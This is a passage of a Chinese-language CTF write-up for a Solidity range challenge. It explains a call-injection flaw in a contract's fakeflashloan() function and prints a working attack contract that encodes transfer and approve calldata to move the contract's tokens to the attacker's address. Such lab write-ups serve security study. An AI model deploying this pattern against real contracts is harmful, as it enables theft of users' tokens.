&#x8BA9;&#x6211;&#x4EEC;&#x628A;&#x89C6;&#x7EBF;&#x653E;&#x5230;<code>fakeflashloan()</code>&#x8FD9;&#x4E2A;&#x5947;&#x602A;&#x7684;&#x51FD;&#x6570;&#x4E0A;&#xFF0C;&#x53EF;&#x4EE5;&#x6CE8;&#x610F;&#x5230;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x5E76;&#x6CA1;&#x6709;&#x5F88;&#x82DB;&#x523B;&#x7684;&#x201C;&#x51C6;&#x5165;&#x6761;&#x4EF6;&#x201D;&#xFF0C;&#x8BA9;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5F88;&#x8F7B;&#x677E;&#x7684;&#x6267;&#x884C;&#x5230;&#x91CC;&#x9762;&#x7684;call&#x65B9;&#x6CD5;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>function fakeflashloan(uint256 value,address target,bytes memory data) public{
        require(isLoan==false&amp;&amp;value&gt;=0&amp;&amp;value&lt;=1000);
        balanceOf[address(this)]-=value;
        balanceOf[target]+=value;

        address(target).call(data);

        isLoan=true;
        require(balanceOf[target]&gt;=value);
        balanceOf[address(this)]+=value;
        balanceOf[target]-=value;
        isLoan=false;
    }
</code></pre><p>&#x800C;call&#x540E;&#x9762;&#x8DDF;&#x7684;&#x53C2;&#x6570;&#x662F;bytes&#x7C7B;&#x578B;&#x7684;data,&#x8FD9;&#x5C31;&#x7ED9;&#x4E86;&#x6211;&#x4EEC;&#x5F88;&#x5927;&#x7684;&#x64CD;&#x4F5C;&#x7A7A;&#x95F4;&#x3002;&#x6B64;&#x65F6;&#x6211;&#x81F3;&#x5C11;&#x60F3;&#x5230;&#x4E86;&#x4E24;&#x79CD;&#x62FF;&#x5230;flag&#x7684;&#x65B9;&#x5F0F;&#xFF0C;&#x4E00;&#x79CD;&#x662F;&#x901A;&#x8FC7;call&#x6CE8;&#x5165;&#x8C03;&#x7528;transfer&#x548C;approve&#x51FD;&#x6570;&#x7ED9;&#x6211;&#x81EA;&#x5DF1;&#x8F6C;&#x8D26;&#xFF0C;&#x5B9E;&#x73B0;&#x76D7;&#x5E01;&#x540E;&#x6267;&#x884C;<code>complete()</code>&#x65B9;&#x6CD5;&#x3002;&#x53E6;&#x4E00;&#x79CD;&#x65B9;&#x5F0F;&#x6BD4;&#x8F83;&#x6295;&#x673A;&#x53D6;&#x5DE7;&#xFF0C;&#x901A;&#x8FC7;call&#x6CE8;&#x5165;&#x8C03;&#x7528;approve&#x51FD;&#x6570;&#xFF0C;<code>_to</code>&#x586B;&#x5408;&#x7EA6;&#x5730;&#x5740;&#xFF0C;&#x8FD9;&#x6837;allowance&#x5C31;&#x8BB0;&#x5F55;&#x4E86;&#x4E00;&#x4E2A;&#x5408;&#x7EA6;&#x81EA;&#x5DF1;&#x7ED9;&#x81EA;&#x5DF1;&#x7684;&#x4E00;&#x7B14;token&#x7684;approve&#xFF0C;&#x540C;&#x6837;&#x53EF;&#x4EE5;&#x7ED5;&#x5F00;complete&#x7684;&#x4E24;&#x4E2A;&#x9650;&#x5236;&#x6761;&#x4EF6;&#x62FF;&#x5230;flag<br><br>
&#x4F46;&#x662F;&#x6211;&#x89C9;&#x5F97;&#x9898;&#x76EE;&#x7684;&#x521D;&#x8877;&#x5E94;&#x8BE5;&#x662F;&#x8981;&#x6211;&#x4EEC;&#x5B8C;&#x6210;&#x76D7;&#x5E01;&#x653B;&#x51FB;&#xFF0C;&#x4E8E;&#x662F;&#x5C06;&#x5176;&#x5B9E;&#x73B0;&#xFF0C;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.4.19;

import&quot;./Vuln.sol&quot;;

contract Attack{

    Vuln cont;
    
    constructor(address _adr){
        cont = Vuln(_adr);
    }

    function attack() public {
        bytes memory byt;
        bytes memory byt2;
        address adr=0x100200fF289D4dA0634fF36d7f5D96524f7EFf67;//&#x6211;&#x7684;&#x8D26;&#x6237;&#x5730;&#x5740;
        byt  =  abi.encodePacked(bytes4(keccak256(&quot;transfer(address,uint256)&quot;)),bytes32(adr),bytes32(10001));
        byt2 =  abi.encodePacked(bytes4(keccak256(&quot;approve(address,uint256)&quot;)),bytes32(adr),bytes32(10001));
        cont.fakeflashloan(1000,address(cont),byt);//transfer 10001&#x4E2A;token&#x7ED9;&#x6211;
        cont.fakeflashloan(1000,address(cont),byt2);//approve 10001&#x4E2A;token&#x7684;approve&#x7ED9;&#x6211;
    }

}
</code></pre><p>&#x6CE8;&#x610F;&#xFF1A;&#x539F;&#x9898;&#x4E2D;&#x7528;&#x5230;&#x4E86;solidity7.0&#x7248;&#x672C;&#x7684;&#x7F16;&#x8BD1;&#x73AF;&#x5883;&#xFF0C;&#x5728;&#x65B0;&#x7248;&#x7684;solidity&#x4E2D;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x4E2D;<code>bytes32(adr),bytes32(10001)</code>&#x7684;&#x8BED;&#x6CD5;&#x662F;&#x4E0D;&#x88AB;&#x5141;&#x8BB8;&#x7684;,&#x6240;&#x4EE5;&#x6211;&#x76F4;&#x63A5;&#x9009;&#x62E9;&#x4E86;&#x7528;&#x66F4;&#x4F4E;&#x7248;&#x672C;&#x7684;&#x6682;&#x65F6;&#x66FF;&#x4EE3;&#x3002;</p>
<blockquote>
<p>PS&#xFF1A;&#x6709;&#x5173;&#x65B0;&#x7248;&#x672C;&#x7684;&#x5199;&#x6CD5;&#x6211;&#x4F1A;&#x5728;&#x540E;&#x7EED;&#x66F4;&#x65B0;</p>
</blockquote>
<p>&#x5728;&#x8FD9;&#x91CC;&#x6211;&#x4EEC;&#x901A;&#x8FC7;&#x8C03;&#x7528;<code>fakeflashloan()</code>&#x8FD9;&#x4E2A;&#x95EE;&#x9898;&#x51FD;&#x6570;&#xFF0C;&#x6784;&#x9020;&#x4E86;<code>byt</code>&#x548C;<code>byt2</code>&#x8FD9;&#x6837;&#x7684;bytes&#x53BB;&#x5B9E;&#x73B0;call&#x6CE8;&#x5165;&#x7684;&#x51FD;&#x6570;&#x8C03;&#x7528;&#x3002;</p>
<p>&#x6784;&#x9020;&#x8FD9;&#x4E2A;bytes&#x5360;&#x4E86;&#x6211;&#x89E3;&#x9898;&#x65F6;&#x5E38;&#x7684;90&#xFF05;&#xFF0C;&#x4E00;&#x76F4;&#x653B;&#x51FB;&#x65E0;&#x6548;&#xFF0C;&#x56E0;&#x4E3A;&#x8FD9;&#x4E2A;&#x9776;&#x573A;&#x6D4B;&#x8BD5;&#x7F51;&#x6CA1;&#x529E;&#x6CD5;debug,&#x7ED9;&#x6211;&#x5E26;&#x6765;&#x4E86;&#x5F88;&#x591A;&#x56F0;&#x96BE;&#x3002;&#x6700;&#x7EC8;&#x6211;&#x9009;&#x62E9;&#x8131;&#x79BB;&#x9776;&#x573A;&#x7684;&#x6D4B;&#x8BD5;&#x7F51;&#x73AF;&#x5883;&#xFF0C;&#x5728;&#x672C;&#x5730;&#x8FDB;&#x884C;&#x6D4B;&#x8BD5;&#x3002;<br><br>
&#x6709;&#x5173;bytes&#x7684;&#x6784;&#x9020;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x53C2;&#x8003;<a href="https://learnblockchain.cn/docs/solidity/abi-spec.html?highlight=abi">solidity&#x7684;abi&#x53C2;&#x8003;&#x6587;&#x6863;</a><br>
<img src="images/range/abi.png" alt></p>
<h1 class="mume-header" id="%E6%94%BB%E5%87%BB%E6%95%88%E6%9E%9C">&#x653B;&#x51FB;&#x6548;&#x679C;&#xFF1A;</h1>

<p>&#x593A;&#x65D7;&#xFF1A;<br>
<img src="images/range/CallFlag.png" alt><br>
&#x5408;&#x7EA6;&#x88AB;&#x653B;&#x51FB;&#x540E;&#xFF1A;<br>
<img src="images/range/suc1.png" alt><br>
<img src="images/range/suc2.png" alt></p>

      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>